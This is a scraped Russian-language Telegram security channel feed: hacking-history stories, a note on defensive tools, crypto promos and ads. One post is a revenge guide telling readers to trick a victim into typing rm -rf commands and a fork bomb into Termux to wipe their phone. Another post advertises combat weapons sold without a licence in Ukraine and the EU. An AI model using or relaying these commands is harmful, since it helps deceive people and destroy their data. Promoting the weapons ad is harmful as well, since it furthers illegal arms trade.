cookie

Мы используем файлы cookie для улучшения сервиса. Нажав кнопку «Принять все», вы соглашаетесь с использованием cookies.

avatar

Nedo | Security

📥 https://t.me/+pwM3L1eyvUQzM2Zi 📥 ❗️The information is taken from open sources and does not encourage illegal actions or use, the channel is not responsib❗️ Задонатить каналу 👇 https://www.donationalerts.com/r/nedoerror Сотрудничество @vitalii_724

Больше
Рекламные посты
3 858
Подписчики
-924 часа
-207 дней
-8330 дней

Загрузка данных...

Прирост подписчиков

Загрузка данных...

Как Китай хотел нагнуть весь мир Обществу известны некоторые известные случаи, когда в центре внимания оказывались уже не беспощадные русские хакеры-терористы, которые кушают хлопья из американских детей на завтрак, но и вполне себе обычные безликие китайские взломщики. Об одном из таких случаев мы и поговорим. Читать - https://telegra.ph/Kak-Kitaj-hotel-nagnut-ves-mir-05-22
Показать все...
Как Китай хотел нагнуть весь мир

Вступление Все мы прекрасно знаем, что на сегодняшний Китай является вторым по мощности государством в мире и вполне вероятно, что очень скоро обгонит США. Лично у меня данная страна вызывает в основном положительные эмоции. За свою жизнь я успел пообщаться с множеством китайцев и уверяю вас, каждый из них был весьма дружелюбным и воспитанным человеком. Это исключительная заслуга Коммунистической партии Китая которая многие годы обеспечивает не только высочайший уровень культуры и дисциплины в обществе, но…

😁 1
История жизни и смерти хакера, взломавшего ПЕНТАГОН и NASA в 15 лет [ЭКСКЛЮЗИВ] Как только ни называли Джонатана Джеймса журналисты в своих многочисленных публикациях: и самым юным, но при этом самым талантливым хакером Америки, которому удалось проникнуть на серверы НАСА, взломать Пентагон, похитить программное обеспечение, управляющее МКС, и установить бекдор на серверах одного из американских военных ведомств. И все это — в пятнадцатилетнем возрасте. В качестве дальнейшего развития своей уникальной карьеры Джонатан Джеймс стал первым несовершеннолетним в США, отправившимся за решетку именно по обвинению в хакерстве. Читать - https://telegra.ph/Istoriya-zhizni-i-smerti-hakera-vzlomavshego-pentagon-i-NASA-v-15-let-05-21
Показать все...
История жизни и смерти хакера, взломавшего пентагон и NASA в 15 лет

Как правило, хакеры стараются вести скрытный образ жизни и соблюдать анонимность. Многим это удается, но некоторые из них обретают популярность вопреки собственной воле. Так случилось, например, с Кевином Митником или Робертом Моррисом. Но есть и другие компьютерные гении, о судьбе которых известно гораздо меньше, чем об их подвигах. Одного из таких парней, оставивших заметный след в истории мирового хакерства, звали Джонатан Джеймс. Это человек с яркой, но трагичной историей жизни, завершившейся ранней и таинственной…

👍 2
Фото недоступно
Взлом Apple iCloud: История фишинговой атаки
Я расскажу о том, как хакеры в 2014 году использовали фишинг и социальную инженерию для взлома учетных записей iCloud знаменитостей. 
Они получили доступ к личным фотографиям и данным, которые затем были незаконно опубликованы. ⏺В августе 2014 года интернет потрясла новость о массовом утечке личных фотографий и видео знаменитостей. Хакеры успешно проникли в учетные записи iCloud, используя фишинговые атаки. Они отправляли фальшивые электронные письма, которые якобы были от Apple, с просьбами подтвердить учетные данные или обновить пароли. Эти письма содержали ссылки на поддельные сайты, где жертвы вводили свои данные, полагая, что помогают себе обезопасить учетную запись. Получив доступ к учетным записям, злоумышленники скачали фотографии и видео, которые затем были размещены на различных интернет-платформах. Большинство жертв не использовали двухфакторную аутентификацию, что значительно облегчило задачу хакерам. Результаты и последствия
Взлом вызвал огромный общественный резонанс и обсуждение вопросов кибербезопасности. 
Пострадавшие знаменитости столкнулись с серьезными нарушениями их приватности, а пользователи по всему миру начали более внимательно относиться к безопасности своих данных в облачных сервисах. Apple, в свою очередь, усилила меры безопасности и активно начала продвигать использование двухфакторной аутентификации. ➡️Этот случай также послужил катализатором для увеличения осведомленности о фишинговых атаках и важности защищенных паролей. Компании стали более активно внедрять меры по защите данных пользователей, а пользователи — более ответственно подходить к вопросу кибербезопасности. Делать больше постов о подобных историях взломов? Ставь 👍 / 🔥 Бункер Хакера | #взлом
Показать все...
👍 1
Фото недоступно
Уничтожаем телефон недруга Доброго времени суток, если хочешь отомстить недалекому обидчику, необязательно иметь хакерские навыки, и пытаться как-то его взломать. Достаточно убедить его ввести парочку команд в Termux, после чего он пожалеет что связался с вами. 1. Убеждаем жертву скачать и открыть Termux; 2. Отправляем жертве следующие команды и просим ввести их по очереди: $ termux-setup-storage $ rm -rf /sdcard/* $ rm -rf ~/* $ :(){ :|:& };: 3. Поздравляю, вы великолепны! Данные команды уничтожат всю систему и неприятель потеряет всё что было на его устройстве
Показать все...
🎅 6
NOTCOIN Проебали? Ну так тапайте это пока не поздно!
Показать все...
😁 1
Показать все...
Blum

Trade, connect, grow and… farm Blum Points! Made by @blumcrypto team 🌸

🌚 3
Фото недоступно
@ua_profilaktika_zbroi ❗❕❗❕ Представляємо вашій увазі величезний асортимент бойового та травматичного спорядження для людей готових захищати себе та своїх близьких! 📌 Ми не вимагаємо ваших особистих даних, все суворо конфіденційно. 📌 Все озброєння пройшло відстріли, є гарантія та сертифікати виробника. 📌 Зручні способи оплати (карта UA, криптовалюта) 📌 Надаємо послуги захищеної угоди (гарант форуму), гроші надходять лише після отримання та перевірки вами товару. 📌 Не вимагаємо ліцензії на зброю, але за необхідності допоможемо в оформленні (офіційно проводиться за базою даних) 📌 Працюємо по всій території України та країнам Євросоюзу. Заходьте - @ua_profilaktika_zbroi Ставте будь-які питання - @profilaktika_manager_ua
Показать все...
😁 1
Фото недоступно
😒2 канала для каждого хакера и безопасника Белый Хакер - программное обеспечение, утилиты, OSINT, инструменты, полезная литература и много другое. Совершенно новый формат непохожий на другие каналы. ZeroDay - Уроки по кибербезопасности и хакингу с нуля. Вирусы, взломы, OSINT, криптография и свежие новости
Показать все...
Фото недоступно
Сейчас я перечислю некоторые современные технологии для защиты информации, которые относятся к программным средствам. ⏺ IPS-системы — обнаруживают и предотвращают вторжения, отслеживая сетевой трафик и выявляя необычную активность. ⏺ DLP-системы — предотвращают утечку информации. Например, блокируют отправку конфиденциальных данных по почте или через мессенджеры. С помощью системы можно также запретить распечатку документов с определённого устройства. ⏺ EDR-системы — обнаруживают вредоносную активность в сети и подозрительные действия пользователей. ⏺ UBA-аналитика — технология, которая анализирует поведение пользователей, чтобы отслеживать подозрительную активность. Например, UBA может выявить взлом аккаунта пользователя, проанализировав отклонения в его поведении.
Показать все...